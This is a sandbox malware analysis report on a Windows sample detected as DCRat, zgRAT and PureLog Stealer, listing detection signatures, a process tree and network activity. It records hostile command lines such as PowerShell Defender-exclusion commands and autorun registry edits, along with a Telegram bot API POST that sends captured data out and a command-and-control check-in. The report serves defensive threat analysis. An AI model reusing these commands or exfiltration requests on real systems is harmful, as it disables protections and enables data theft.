Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
W4tW72sfAD.exe

Overview

General Information

Sample name:W4tW72sfAD.exe
renamed because original name is a hash value
Original sample name:9026338FCE277581062754CAB87462E7.exe
Analysis ID:1428727
MD5:9026338fce277581062754cab87462e7
SHA1:191b8d92c18b84fdef03f691583d8b89598cb7da
SHA256:5565710131f195b46fb7c0b124d16df72ec5e0aafdd22590eaff7885aead636f
Tags:DCRatexe
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
Adds a directory exclusion to Windows Defender
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files to the user root directory
Drops executable to a common third party application directory
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • W4tW72sfAD.exe (PID: 6988 cmdline: "C:\Users\user\Desktop\W4tW72sfAD.exe" MD5: 9026338FCE277581062754CAB87462E7)
    • csc.exe (PID: 4080 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 2708 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCC57.tmp" "c:\Windows\System32\CSCC6B1193CD9FE40B5844F837FF967B9E7.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 5104 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3668 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7140 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\RuntimeBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7208 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\internet explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7904 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7248 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7556 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9x00cPKFqM.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7660 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 7760 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
  • RuntimeBroker.exe (PID: 6348 cmdline: C:\Users\Public\Downloads\RuntimeBroker.exe MD5: 9026338FCE277581062754CAB87462E7)
  • RuntimeBroker.exe (PID: 5100 cmdline: C:\Users\Public\Downloads\RuntimeBroker.exe MD5: 9026338FCE277581062754CAB87462E7)
  • RuntimeBroker.exe (PID: 7680 cmdline: "C:\Users\Public\Downloads\RuntimeBroker.exe" MD5: 9026338FCE277581062754CAB87462E7)
  • juptXkyeRvGsIZrQGeVEsrnWhD.exe (PID: 8076 cmdline: "C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe" MD5: 9026338FCE277581062754CAB87462E7)
    • cmd.exe (PID: 6176 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7880 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • RuntimeBroker.exe (PID: 2032 cmdline: "C:\Users\Public\Downloads\RuntimeBroker.exe" MD5: 9026338FCE277581062754CAB87462E7)
  • RuntimeBroker.exe (PID: 2792 cmdline: "C:\Users\Public\Downloads\RuntimeBroker.exe" MD5: 9026338FCE277581062754CAB87462E7)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
W4tW72sfAD.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    W4tW72sfAD.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 5 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000000.00000000.1644759918.0000000000A12000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000000.00000002.1756102342.000000001303D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    Process Memory Space: W4tW72sfAD.exe PID: 6988JoeSecurity_DCRat_1Yara detected DCRatJoe Security

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      0.0.W4tW72sfAD.exe.a10000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                        0.0.W4tW72sfAD.exe.a10000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: Execution from Suspicious Folder
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Downloads\RuntimeBroker.exe, CommandLine: C:\Users\Public\Downloads\RuntimeBroker.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Downloads\RuntimeBroker.exe, NewProcessName: C:\Users\Public\Downloads\RuntimeBroker.exe, OriginalFileName: C:\Users\Public\Downloads\RuntimeBroker.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\Public\Downloads\RuntimeBroker.exe, ProcessId: 6348, ProcessName: RuntimeBroker.exe
                          Sigma detected: Files With System Process Name In Unsuspected Locations
                          Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\W4tW72sfAD.exe, ProcessId: 6988, TargetFilename: C:\Users\Public\Downloads\RuntimeBroker.exe
                          Sigma detected: New RUN Key Pointing to Suspicious Folder
                          Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\Public\Downloads\RuntimeBroker.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\W4tW72sfAD.exe, ProcessId: 6988, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker
                          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\W4tW72sfAD.exe", ParentImage: C:\Users\user\Desktop\W4tW72sfAD.exe, ParentProcessId: 6988, ParentProcessName: W4tW72sfAD.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe', ProcessId: 5104, ProcessName: powershell.exe
                          Sigma detected: System File Execution Location Anomaly
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Users\Public\Downloads\RuntimeBroker.exe, CommandLine: C:\Users\Public\Downloads\RuntimeBroker.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Downloads\RuntimeBroker.exe, NewProcessName: C:\Users\Public\Downloads\RuntimeBroker.exe, OriginalFileName: C:\Users\Public\Downloads\RuntimeBroker.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\Public\Downloads\RuntimeBroker.exe, ProcessId: 6348, ProcessName: RuntimeBroker.exe
                          Sigma detected: CurrentVersion Autorun Keys Modification
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\W4tW72sfAD.exe, ProcessId: 6988, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\juptXkyeRvGsIZrQGeVEsrnWhD
                          Sigma detected: CurrentVersion NT Autorun Keys Modification
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\W4tW72sfAD.exe, ProcessId: 6988, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                          Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\W4tW72sfAD.exe", ParentImage: C:\Users\user\Desktop\W4tW72sfAD.exe, ParentProcessId: 6988, ParentProcessName: W4tW72sfAD.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline", ProcessId: 4080, ProcessName: csc.exe
                          Sigma detected: Powershell Defender Exclusion
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\W4tW72sfAD.exe", ParentImage: C:\Users\user\Desktop\W4tW72sfAD.exe, ParentProcessId: 6988, ParentProcessName: W4tW72sfAD.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe', ProcessId: 5104, ProcessName: powershell.exe
                          Sigma detected: Dynamic CSharp Compile Artefact
                          Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\W4tW72sfAD.exe, ProcessId: 6988, TargetFilename: C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline
                          Sigma detected: Non Interactive PowerShell Process Spawned
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\W4tW72sfAD.exe", ParentImage: C:\Users\user\Desktop\W4tW72sfAD.exe, ParentProcessId: 6988, ParentProcessName: W4tW72sfAD.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe', ProcessId: 5104, ProcessName: powershell.exe
                          Sigma detected: Windows Processes Suspicious Parent Directory
                          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7880, ProcessName: svchost.exe

                          Data Obfuscation

                          barindex
                          Sigma detected: Dot net compiler compiles file from suspicious location
                          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\W4tW72sfAD.exe", ParentImage: C:\Users\user\Desktop\W4tW72sfAD.exe, ParentProcessId: 6988, ParentProcessName: W4tW72sfAD.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline", ProcessId: 4080, ProcessName: csc.exe

                          Snort Signatures

                          Timestamp:04/19/24-13:42:33.224120
                          SID:2048095
                          Source Port:49739
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus / Scanner detection for submitted sample
                          Source: W4tW72sfAD.exeAvira: detected
                          Antivirus detection for URL or domain
                          Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
                          Antivirus detection for dropped file
                          Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Users\user\AppData\Local\Temp\9x00cPKFqM.batAvira: detection malicious, Label: BAT/Delbat.C
                          Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Users\user\Desktop\GNRoGDmH.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                          Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Users\user\Desktop\EkAnmMVM.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                          Source: C:\Users\user\Desktop\BazpdGXT.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                          Multi AV Scanner detection for dropped file
                          Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exeReversingLabs: Detection: 68%
                          Source: C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exeReversingLabs: Detection: 68%
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeReversingLabs: Detection: 68%
                          Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exeReversingLabs: Detection: 68%
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeReversingLabs: Detection: 68%
                          Source: C:\Users\user\Desktop\BazpdGXT.logReversingLabs: Detection: 66%
                          Source: C:\Users\user\Desktop\EkAnmMVM.logReversingLabs: Detection: 66%
                          Source: C:\Users\user\Desktop\NEEtYbtY.logReversingLabs: Detection: 66%
                          Multi AV Scanner detection for submitted file
                          Source: W4tW72sfAD.exeReversingLabs: Detection: 68%
                          Machine Learning detection for dropped file
                          Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\BuKwfPUT.logJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exeJoe Sandbox ML: detected
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exeJoe Sandbox ML: detected
                          Machine Learning detection for sample
                          Source: W4tW72sfAD.exeJoe Sandbox ML: detected
                          Source: W4tW72sfAD.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exeJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\9da3c047e935b1Jump to behavior
                          Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49730 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49749 version: TLS 1.2
                          Source: W4tW72sfAD.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.pdb source: W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003702000.00000004.00000800.00020000.00000000.sdmp

                          Spreading

                          barindex
                          Infects executable files (exe, dll, sys, html)
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 4x nop then jmp 00007FFD9B890356h19_2_00007FFD9B89014E
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 4x nop then jmp 00007FFD9B890356h20_2_00007FFD9B89014E
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeCode function: 4x nop then jmp 00007FFD9B8B0356h21_2_00007FFD9B8B014E
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeCode function: 4x nop then jmp 00007FFD9B890356h22_2_00007FFD9B89014E
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 4x nop then jmp 00007FFD9B8A0356h38_2_00007FFD9B8A014E
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeCode function: 4x nop then jmp 00007FFD9B8B0356h41_2_00007FFD9B8B014E
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 4x nop then jmp 00007FFD9B890356h44_2_00007FFD9B89014E

                          Networking

                          barindex
                          Snort IDS alert for network traffic
                          Source: TrafficSnort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49739 -> 104.21.57.61:80
                          Performs DNS queries to domains with low reputation
                          Source: DNS query: minecrafthyipixel.xyz
                          Uses ping.exe to check the status of other devices and networks
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Uses the Telegram API (likely for C&C communication)
                          Source: unknownDNS query: name: api.telegram.org
                          Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                          Source: global trafficHTTP traffic detected: POST /bot6499149886:AAEaWHYhZxpFDZTcqGoOIgb5aWoEwpeON7Q/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="375a82a9-434c-43d0-8d25-c0ccd816cce2"Host: api.telegram.orgContent-Length: 100984Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                          Source: Joe Sandbox ViewIP Address: 34.117.186.192 34.117.186.192
                          Source: Joe Sandbox ViewIP Address: 34.117.186.192 34.117.186.192
                          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                          Source: unknownDNS query: name: ipinfo.io
                          Source: unknownDNS query: name: ipinfo.io
                          Source: unknownDNS query: name: ipinfo.io
